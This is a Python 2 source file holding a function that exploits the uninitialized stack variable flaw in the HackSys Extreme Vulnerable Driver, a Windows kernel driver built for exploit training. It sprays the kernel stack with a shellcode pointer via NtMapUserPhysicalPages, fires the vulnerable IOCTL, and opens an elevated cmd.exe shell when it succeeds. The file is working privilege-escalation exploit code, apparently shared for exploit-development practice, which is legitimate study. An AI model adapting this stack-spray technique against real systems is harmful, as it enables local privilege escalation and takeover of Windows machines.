HEVD_ununitializedstackvariable.py 文件源码

def trigger_uninitialized_stack_variable():
    dwReturn      = c_ulong()
    driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
    if not driver_handle or driver_handle == -1:
        print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
        sys.exit()


    magicvalue = struct.pack("<L", 0xBAD0B0B1) #as long as it's not 0xBAD0B0B0
    magicvalue_ptr = id(magicvalue) + 20
    magicvalue_size  = len(magicvalue)
    print "[+] Buf size: %d" % magicvalue_size
    einput  = create_string_buffer(magicvalue, magicvalue_size)

    # stack spray
    shellcode_ptr = heap_alloc_payload()
    print "[+] Spraying stack with address: 0x%X" % shellcode_ptr
    print "[+] Triggering vuln .."

    ntdll.NtMapUserPhysicalPages(0, 1024, struct.pack("<L", shellcode_ptr) * 1024)
    kernel32.DeviceIoControl(driver_handle, 0x22202F, magicvalue_ptr, magicvalue_size, None, 0,byref(dwReturn), None)

    if shell.IsUserAnAdmin():
        print "[*] Enjoy Elevated Privs !\r\n"
        os.system('cmd.exe')
    else:
        print "[-] Exploit did not work. Re-run it!"